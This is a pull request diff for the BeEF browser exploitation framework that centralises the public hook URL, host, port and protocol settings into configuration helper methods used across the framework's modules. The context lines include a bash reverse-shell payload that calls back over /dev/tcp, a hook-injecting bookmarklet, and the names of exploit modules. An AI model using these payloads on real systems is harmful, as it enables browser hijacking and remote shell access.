### PR TITLE
Bug: Core - 1785 Fixed public hook url configuration settings

### DIFF
--- a/beef
+++ b/beef
@@ -109,13 +109,13 @@ end
 #
 # @note Validate beef.http.public and beef.http.public_port
 #
-unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
-  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
+unless config.get('beef.http.public.host').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public.host'))
+  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public.host')}"
   exit 1
 end
 
-unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
-  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
+unless config.get('beef.http.public.port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public.port'))
+  print_error "ERROR: Invalid public port: #{config.get('beef.http.public.port')}"
   exit 1
 end
 

--- a/config.yaml
+++ b/config.yaml
@@ -47,8 +47,14 @@ beef:
 
         # Host Name / Domain Name
         # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
-        #   set the public hostname below:
-        #public: ""      # public hostname/IP address
+        # These settings will be used to create a public facing URL
+        # This public facing URL will be used for all hook related calls
+        # set the public setting below:
+        # public: ""
+        #     host: "" # public hostname/IP address
+        #     port: "" # public port will default to 80 if no https 443 if https 
+                      # and local if not set but there is a public host
+        #     https: false # true/false
 
         # Reverse Proxy / NAT
         # If you want BeEF to be accessible behind a reverse proxy or NAT,
@@ -56,8 +62,6 @@ beef:
         # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
         #   by altering the X-FORWARDED-FOR ip address in the request header.
         allow_reverse_proxy: false
-        #public: ""      # public hostname/IP address
-        #public_port: "" # public port (experimental)
 
         # Hook
         hook_file: "/hook.js"

--- a/config.yaml
+++ b/config.yaml
@@ -89,6 +89,8 @@ beef:
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
+            # Enabled this config setting if you're external facing uri is using https
+            public_enabled: false
             # In production environments, be sure to use a valid certificate signed for the value
             # used in beef.http.public (the domain name of the server where you run BeEF)
             key: "beef_key.pem"

--- a/core/main/command.rb
+++ b/core/main/command.rb
@@ -42,7 +42,8 @@ module BeEF
     #       Two instances of this object are created during the execution of command module.
     #
     class Command
-      attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
+      attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname,
+      :config
       attr_accessor :zombie, :command_id, :session_id
 
       include BeEF::Core::CommandUtils
@@ -55,15 +56,15 @@ module BeEF
       # @param [String] key command module key
       #
       def initialize(key)
-        config = BeEF::Core::Configuration.instance
+        @config = BeEF::Core::Configuration.instance
 
         @key = key
         @datastore = {}
-        @friendlyname = config.get("beef.module.#{key}.name")
+        @friendlyname = @config.get("beef.module.#{key}.name")
         @output = ''
-        @path = config.get("beef.module.#{key}.path")
+        @path = @config.get("beef.module.#{key}.path")
         @default_command_url = config.get("beef.module.#{key}.mount")
-        @id = config.get("beef.module.#{key}.db.id")
+        @id = @config.get("beef.module.#{key}.db.id")
         @auto_update_zombie = false
         @results = {}
         @beefjs_components = {}

--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -186,7 +186,7 @@ module BeEF
       # Returns the configuration value for the local https enabled
       # If nothing is set it should default to false
       def public_https_enabled?
-        get('beef.http.https.public_enabled') || false
+        get('beef.http.public.https') || false
       end
 
       #
@@ -280,7 +280,8 @@ module BeEF
       private
 
       def validate_public_config_variable?(config)
-        return true if (config['beef']['http']['public'].is_a?(Hash) || config['beef']['http']['public'].is_a?(NilClass))
+        return true if (config['beef']['http']['public'].is_a?(Hash) || 
+                        config['beef']['http']['public'].is_a?(NilClass))
 
 
         print_error 'Config path beef.http.public is deprecated.'

--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -103,14 +103,14 @@ module BeEF
       # Return the local protocol
       # if nothing is set default to http
       def local_proto
-        get('beef.http.https.enabled') ? 'https' : 'http'
+        local_https_enabled ? 'https' : 'http'
       end
 
       #
       # Returns the configuration value for the local https enabled
       # If nothing is set it should default to false
       def local_https_enabled
-        get('beef.http.https.enabled') || false
+        get('beef.http.https.enable') || false
       end
 
       #

--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -73,6 +73,15 @@ module BeEF
           return
         end
 
+        return unless validate_public_config_variable?(@config)
+
+        if @config['beef']['http']['public_port']
+          print_error 'Config path beef.http.public_port is deprecated.'
+          print_error 'Please use the new format for public variables found'
+          print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
+          return
+        end
+
         true
       end
 
@@ -107,7 +116,7 @@ module BeEF
       #
       # Returns the configuration value for the http server host
       def public_host
-        get('beef.http.public')
+        get('beef.http.public.host')
       end
 
       #
@@ -125,7 +134,7 @@ module BeEF
       end
 
       def public_enabled?
-        !get('beef.http.public').nil?
+        !get('beef.http.public.host').nil?
       end
       
       #
@@ -266,6 +275,17 @@ module BeEF
             y['beef']['module'].keys.first
           )
         end
+      end
+
+      private
+
+      def validate_public_config_variable?(config)
+        return true if config['beef']['http']['public'].is_a?(Hash)
+
+        print_error 'Config path beef.http.public is deprecated.'
+        print_error 'Please use the new format for public variables found'
+        print_error 'https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration'
+        false
       end
     end
   end

--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -77,6 +77,110 @@ module BeEF
       end
 
       #
+      # Returns the configuration value for the http server host
+      # If nothing is set it should default to 0.0.0.0 (all interfaces)
+      def local_host
+        get('beef.http.host') || '0.0.0.0'
+      end
+
+      #
+      # Returns the configuration value for the http server port
+      # If nothing is set it should default to 3000
+      def local_port
+        get('beef.http.port') || '3000'
+      end
+
+      #
+      # Return the local protocol
+      # if nothing is set default to http
+      def local_proto
+        get('beef.http.https.enabled') ? 'https' : 'http'
+      end
+
+      #
+      # Returns the configuration value for the local https enabled
+      # If nothing is set it should default to false
+      def local_https_enabled
+        get('beef.http.https.enabled') || false
+      end
+
+      #
+      # Returns the configuration value for the http server host
+      def public_host
+        get('beef.http.public')
+      end
+
+      #
+      # Returns the beef host which is used by external resources
+      # e.g. hooked browsers
+      def beef_host
+        public_host || local_host
+      end
+
+      #
+      # Returns the beef port which is used by external resource
+      # e.g. hooked browsers
+      def beef_port
+        public_port || local_port
+      end
+
+      def public_enabled?
+        !get('beef.http.public').nil?
+      end
+      
+      #
+      # Returns the beef protocol that is used by external resources
+      # e.g. hooked browsers
+      def beef_proto
+        if public_enabled? && public_https_enabled? then
+          return 'https'
+        elsif public_enabled? && !public_https_enabled?
+          return 'http'
+        elsif !public_enabled?
+          return local_proto
+        end
+      end
+
+      #
+      # Returns the beef scheme://host:port for external resources
+      # e.g. hooked browsers
+      def beef_url_str
+        "#{beef_proto}://#{beef_host}:#{beef_port}"
+      end
+
+      # Returns the hool path value stored in the config file
+      #
+      # @return [String] hook file path
+      def hook_file_path
+        get('beef.http.hook_file') || '/hook.js'
+      end
+
+      # Returns the url to the hook file
+      #
+      # @return [String] the url string
+      def hook_url
+        "#{beef_url_str}#{hook_file_path}"
+      end
+
+      # Returns the configuration value for the http server port
+      # If nothing is set it should default to 3000
+      def public_port
+        return get('beef.http.public_port') unless get('beef.http.public_port').nil?
+
+        return '443' if public_https_enabled?
+        return '80' unless public_host.nil?
+
+        nil
+      end
+
+      #
+      # Returns the configuration value for the local https enabled
+      # If nothing is set it should default to false
+      def public_https_enabled?
+        get('beef.http.https.public_enabled') || false
+      end
+
+      #
       # Returns the value of a selected key in the configuration file.
       # @param [String] key Key of configuration item
       # @return [Hash|String] The resulting value stored against the 'key'

--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -280,7 +280,8 @@ module BeEF
       private
 
       def validate_public_config_variable?(config)
-        return true if config['beef']['http']['public'].is_a?(Hash)
+        return true if (config['beef']['http']['public'].is_a?(Hash) || config['beef']['http']['public'].is_a?(NilClass))
+
 
         print_error 'Config path beef.http.public is deprecated.'
         print_error 'Please use the new format for public variables found'

--- a/core/main/configuration.rb
+++ b/core/main/configuration.rb
@@ -174,7 +174,7 @@ module BeEF
       # Returns the configuration value for the http server port
       # If nothing is set it should default to 3000
       def public_port
-        return get('beef.http.public_port') unless get('beef.http.public_port').nil?
+        return get('beef.http.public.port') unless get('beef.http.public.port').nil?
 
         return '443' if public_https_enabled?
         return '80' unless public_host.nil?

--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -48,7 +48,8 @@ module Banners
     def print_network_interfaces_count
       # get the configuration information
       configuration = BeEF::Core::Configuration.instance
-      beef_host = configuration.get('beef.http.host')
+      # local host
+      beef_host = configuration.local_host
 
       # create an array of the interfaces the framework is listening on
       if beef_host == '0.0.0.0' # the framework will listen on all interfaces
@@ -77,27 +78,26 @@ module Banners
     #
     def print_network_interfaces_routes
       configuration = BeEF::Core::Configuration.instance
-      proto = configuration.get("beef.http.https.enable") == true ? 'https' : 'http'
-      hook_file = configuration.get("beef.http.hook_file")
+      # local config settings
+      proto = configuration.local_proto
+      hook_file = configuration.hook_file
       admin_ui = configuration.get("beef.extension.admin_ui.enable") ? true : false
       admin_ui_path = configuration.get("beef.extension.admin_ui.base_path")
 
       # display the hook URL and Admin UI URL on each interface from the interfaces array
       self.interfaces.map do |host|
         print_info "running on network interface: #{host}"
-        port = configuration.get("beef.http.port")
+        port = configuration.local_port
         data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
         data += "UI URL:   #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
         print_more data
       end
 
       # display the public hook URL and Admin UI URL
-      if configuration.get("beef.http.public")
-        host = configuration.get('beef.http.public')
-        port = configuration.get("beef.http.public_port") || configuration.get('beef.http.port')
+      if configuration.public_enabled?
         print_info 'Public:'
-        data = "Hook URL: #{proto}://#{host}:#{port}#{hook_file}\n"
-        data += "UI URL:   #{proto}://#{host}:#{port}#{admin_ui_path}/panel\n" if admin_ui
+        data = "Hook URL: #{configuration.hook_url}\n"
+        data += "UI URL:   #{configuration.beef_url_str}#{admin_ui_path}/panel\n" if admin_ui
         print_more data
       end
     end
@@ -130,9 +130,9 @@ module Banners
     def print_websocket_servers
       config = BeEF::Core::Configuration.instance
       ws_poll_timeout = config.get('beef.http.websocket.ws_poll_timeout')
-      print_info "Starting WebSocket server ws://#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
+      print_info "Starting WebSocket server ws://#{config.beef_host}:#{config.get("beef.http.websocket.port").to_i} [timer: #{ws_poll_timeout}]"
       if config.get("beef.http.websocket.secure")
-        print_info "Starting WebSocketSecure server on wss://[#{config.get('beef.http.host')}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
+        print_info "Starting WebSocketSecure server on wss://[#{config.beef_host}:#{config.get("beef.http.websocket.secure_port").to_i} [timer: #{ws_poll_timeout}]"
       end
     end
   end

--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -80,7 +80,7 @@ module Banners
       configuration = BeEF::Core::Configuration.instance
       # local config settings
       proto = configuration.local_proto
-      hook_file = configuration.hook_file
+      hook_file = configuration.hook_file_path
       admin_ui = configuration.get("beef.extension.admin_ui.enable") ? true : false
       admin_ui_path = configuration.get("beef.extension.admin_ui.base_path")
 

--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -12,19 +12,12 @@ module BeEF
   module Core
     class Server
       include Singleton
-
-      # @note Grabs the version of beef the framework is deployed on
-      VERSION = BeEF::Core::Configuration.instance.get('beef.version')
-
       attr_reader :root_dir, :url, :configuration, :command_urls, :mounts, :semaphore
 
       def initialize
         @configuration = BeEF::Core::Configuration.instance
-        beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
-        beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-        beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-        @url = "#{beef_proto}://#{beef_host}:#{beef_port}"
-        @root_dir = File.expand_path('../../../', __FILE__)
+        @url = @configuration.beef_url_str
+        @root_dir = File.expand_path('../../../', __dir__)
         @command_urls = {}
         @mounts = {}
         @rack_app
@@ -33,16 +26,16 @@ module BeEF
 
       def to_h
         {
-            'beef_version'  => VERSION,
-            'beef_url'      => @url,
-            'beef_root_dir' => @root_dir,
-            'beef_host'     => @configuration.get('beef.http.host'),
-            'beef_port'     => @configuration.get('beef.http.port'),
-            'beef_public'   => @configuration.get('beef.http.public'),
-            'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_hook'     => @configuration.get('beef.http.hook_file'),
-            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? 'https' : 'http',
-            'client_debug'  => @configuration.get('beef.client_debug')
+          'beef_version' => @configuration.get('beef_version'),
+          'beef_url' => @url,
+          'beef_root_dir' => @root_dir,
+          'beef_host' => @configuration.beef_host,
+          'beef_port' => @configuration.beef_port,
+          'beef_public' => @configuration.public_host,
+          'beef_public_port' => @configuration.public_port,
+          'beef_hook' => @configuration.get('beef.http.hook_file'),
+          'beef_proto' => @configuration.beef_proto,
+          'client_debug' => @configuration.get('beef.client_debug')
         }
       end
 

--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -7,12 +7,7 @@
 WelcomeTab = function() {
 
   <%
-    @configuration = BeEF::Core::Configuration.instance
-    beef_proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http";
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-    beef_hook = @configuration.get("beef.http.hook_file")
-    hook_url = "#{beef_proto}://#{beef_host}:#{beef_port}/#{beef_hook}"
+    hook_url = BeEF::Core::Configuration.instance.hook_url
   %>
 
     var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27<%= hook_url %>%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"

--- a/extensions/qrcode/qrcode.rb
+++ b/extensions/qrcode/qrcode.rb
@@ -19,9 +19,9 @@ module Qrcode
 
       # get server config
       configuration = BeEF::Core::Configuration.instance
-      beef_proto = configuration.get('beef.http.https.enable') == true ? "https" : "http"
-      beef_host  = configuration.get("beef.http.public") || configuration.get("beef.http.host")
-      beef_port  = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+      beef_proto = configuration.beef_proto
+      beef_host  = configuration.beef_host
+      beef_port  = configuration.beef_port
 
       # get URLs from QR config
       configuration.get("beef.extension.qrcode.targets").each do |target|

--- a/extensions/social_engineering/powershell/bind_powershell.rb
+++ b/extensions/social_engineering/powershell/bind_powershell.rb
@@ -28,11 +28,10 @@ module BeEF
         # serves the HTML Application (HTA)
         get '/hta' do
           response['Content-Type'] = "application/hta"
-          host = BeEF::Core::Configuration.instance.get('beef.http.public') || BeEF::Core::Configuration.instance.get('beef.http.host')
-          port = BeEF::Core::Configuration.instance.get('beef.http.public_port') || BeEF::Core::Configuration.instance.get('beef.http.port')
-          proto = BeEF::Core::Configuration.instance.get("beef.http.https.enable") == true ? "https" : "http"
-          ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url')
-          payload_url = "#{proto}://#{host}:#{port}#{ps_url}/ps.png"
+          @config = BeEF::Core::Configuration.instance
+          beef_url_str = @config.beef_url_str
+          ps_url = @config.get('beef.extension.social_engineering.powershell.powershell_handler_url')
+          payload_url = "#{beef_url_str}#{ps_url}/ps.png"
 
           print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
           "<script>

--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -14,7 +14,7 @@ module BeEF
           @http_server = BeEF::Core::Server.instance
           @config = BeEF::Core::Configuration.instance
           @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
-          @beef_hook = "#{@config.hook_url}#{@config.get('beef.http.hook_file')}"
+          @beef_hook = "#{@config.hook_url}"
         end
 
         def clone_page(url, mount, use_existing, dns_spoof)

--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -14,10 +14,7 @@ module BeEF
           @http_server = BeEF::Core::Server.instance
           @config = BeEF::Core::Configuration.instance
           @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/"
-          beef_proto = @config.get("beef.http.https.enable") == true ? "https" : "http"
-          beef_host = @config.get("beef.http.public") || @config.get("beef.http.host")
-          beef_port = @config.get("beef.http.public_port") || @config.get("beef.http.port")
-          @beef_hook = "#{beef_proto}://#{beef_host}:#{beef_port}#{@config.get('beef.http.hook_file')}"
+          @beef_hook = "#{@config.hook_url}#{@config.get('beef.http.hook_file')}"
         end
 
         def clone_page(url, mount, use_existing, dns_spoof)

--- a/modules/browser/hooked_domain/deface_web_page/module.rb
+++ b/modules/browser/hooked_domain/deface_web_page/module.rb
@@ -7,9 +7,9 @@ class Deface_web_page < BeEF::Core::Command
 
   def self.options
         @configuration = BeEF::Core::Configuration.instance
-        proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-        beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-        beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+        proto = @configuration.beef_proto
+        beef_host = @configuration.beef_host
+        beef_port = @configuration.beef_port
         base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
 	favicon_uri = "#{base_host}/ui/media/images/favicon.ico"

--- a/modules/browser/hooked_domain/get_stored_credentials/module.rb
+++ b/modules/browser/hooked_domain/get_stored_credentials/module.rb
@@ -7,9 +7,9 @@ class Get_stored_credentials < BeEF::Core::Command
 
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-                beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-                beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+                proto = @configuration.beef_proto
+                beef_host = @configuration.beef_host
+                beef_port = @configuration.beef_port
                 base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
                 uri = "#{base_host}/demos/butcher/index.html"

--- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb
+++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb
@@ -7,9 +7,9 @@ class Site_redirect_iframe < BeEF::Core::Command
   
     def self.options
         @configuration = BeEF::Core::Configuration.instance
-        proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-        beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-        beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+        proto = @configuration.beef_proto
+        beef_host = @configuration.beef_host
+        beef_port = @configuration.beef_port
         base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
         favicon_uri = "#{base_host}/ui/media/images/favicon.ico"

--- a/modules/browser/play_sound/module.rb
+++ b/modules/browser/play_sound/module.rb
@@ -9,9 +9,9 @@ class Play_sound < BeEF::Core::Command
   def self.options
 
     @configuration = BeEF::Core::Configuration.instance
-    proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http"
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    proto = @configuration.beef_proto
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     base_host = "#{proto}://#{beef_host}:#{beef_port}"
 
     sound_file_url = "#{base_host}/demos/sound.wav"

--- a/modules/debug/test_network_request/module.rb
+++ b/modules/debug/test_network_request/module.rb
@@ -13,8 +13,8 @@ class Test_network_request < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
-    beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
+    beef_host = @configuration.beef_host
+    beef_port = @configuration.beef_port
     hook_path = @configuration.get("beef.http.hook_file")
 
     return [

--- a/modules/exploits/apache_felix_remote_shell/module.rb
+++ b/modules/exploits/apache_felix_remote_shell/module.rb
@@ -7,7 +7,7 @@ class Apache_felix_remote_shell < BeEF::Core::Command
   
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = configuration.beef_host
     lhost = "" if lhost == "0.0.0.0"
     return [
       { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' }, 

--- a/modules/exploits/farsite_x25_remote_shell/module.rb
+++ b/modules/exploits/farsite_x25_remote_shell/module.rb
@@ -3,7 +3,7 @@ class Farsite_x25_remote_shell < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
       { 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore',
           'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']],

--- a/modules/exploits/jenkins_groovy_code_exec/module.rb
+++ b/modules/exploits/jenkins_groovy_code_exec/module.rb
@@ -7,7 +7,7 @@ class Jenkins_groovy_code_exec < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = configuration.beef_host
     lhost = "" if lhost == "0.0.0.0"
     return [
       { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },

--- a/modules/exploits/local_host/java_payload/module.rb
+++ b/modules/exploits/local_host/java_payload/module.rb
@@ -11,7 +11,7 @@ class Java_payload < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP'},
         {'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host},

--- a/modules/exploits/local_host/signed_applet_dropper/module.rb
+++ b/modules/exploits/local_host/signed_applet_dropper/module.rb
@@ -14,7 +14,7 @@ class Signed_applet_dropper < BeEF::Core::Command
 
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
         {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
         {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},

--- a/modules/exploits/m0n0wall/module.rb
+++ b/modules/exploits/m0n0wall/module.rb
@@ -10,7 +10,7 @@ class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
   
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

--- a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
+++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb
@@ -10,7 +10,7 @@ class Freenas_reverse_root_shell_csrf < BeEF::Core::Command
   
 	def self.options
 		@configuration = BeEF::Core::Configuration.instance
-		lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+		lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

--- a/modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/module.rb
+++ b/modules/exploits/pfsense/pfsense_reverse_root_shell_csrf/module.rb
@@ -7,7 +7,7 @@ class Pfsense_reverse_root_shell_csrf < BeEF::Core::Command
   
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -149,7 +149,7 @@ EOS
   
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-                lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+                lhost = configuration.beef_host
                 lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rproto',

--- a/modules/exploits/router/wipg1000_cmd_injection/module.rb
+++ b/modules/exploits/router/wipg1000_cmd_injection/module.rb
@@ -7,7 +7,7 @@ class Wipg1000_cmd_injection < BeEF::Core::Command
   
   def self.options
     @configuration = BeEF::Core::Configuration.instance
-    lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    lhost = @configuration.beef_host
     lhost = '' if lhost.to_s.eql?('0.0.0.0')
 
     return [

--- a/modules/exploits/shell_shock_scanner/module.rb
+++ b/modules/exploits/shell_shock_scanner/module.rb
@@ -7,7 +7,7 @@ class Shell_shock_scanner < BeEF::Core::Command
   
 	def self.options
 		configuration = BeEF::Core::Configuration.instance
-		lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+		lhost = configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'method', 'ui_label' => 'HTTP Method',  'value' => 'GET' },

--- a/modules/exploits/shell_shocked/module.rb
+++ b/modules/exploits/shell_shocked/module.rb
@@ -7,7 +7,7 @@ class Shell_shocked < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
+    lhost = configuration.beef_host
     lhost = "LHOST" if lhost == "0.0.0.0"
     payload = "/bin/bash -i >& /dev/tcp/#{lhost}/LPORT 0>&1"
 

--- a/modules/exploits/vtiger_crm_upload_exploit/module.rb
+++ b/modules/exploits/vtiger_crm_upload_exploit/module.rb
@@ -16,7 +16,7 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command
     end
 
     @configuration = BeEF::Core::Configuration.instance
-    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    beef_host = @configuration.beef_host
     return [
           {'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
           {'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},

--- a/modules/exploits/wanem_command_execution/module.rb
+++ b/modules/exploits/wanem_command_execution/module.rb
@@ -10,7 +10,7 @@ class Wanem_command_execution < BeEF::Core::Command
 
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 

--- a/modules/exploits/zenoss_3x_command_execution/module.rb
+++ b/modules/exploits/zenoss_3x_command_execution/module.rb
@@ -10,7 +10,7 @@ class Zenoss_command_execution < BeEF::Core::Command
 
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/module.rb
@@ -6,7 +6,7 @@
 class Zeroshell_2_0rc2_reverse_shell_csrf_sop < BeEF::Core::Command
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/module.rb
@@ -10,7 +10,7 @@ class Zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass < BeEF::Core::Command
 	
 	def self.options
                 @configuration = BeEF::Core::Configuration.instance
-                lhost = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+                lhost = @configuration.beef_host
 		lhost = "" if lhost == "0.0.0.0"
 		return [
 			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.0.1'}, 

--- a/modules/host/hook_microsoft_edge/module.rb
+++ b/modules/host/hook_microsoft_edge/module.rb
@@ -6,11 +6,8 @@
 
 class Hook_microsoft_edge < BeEF::Core::Command
   def self.options
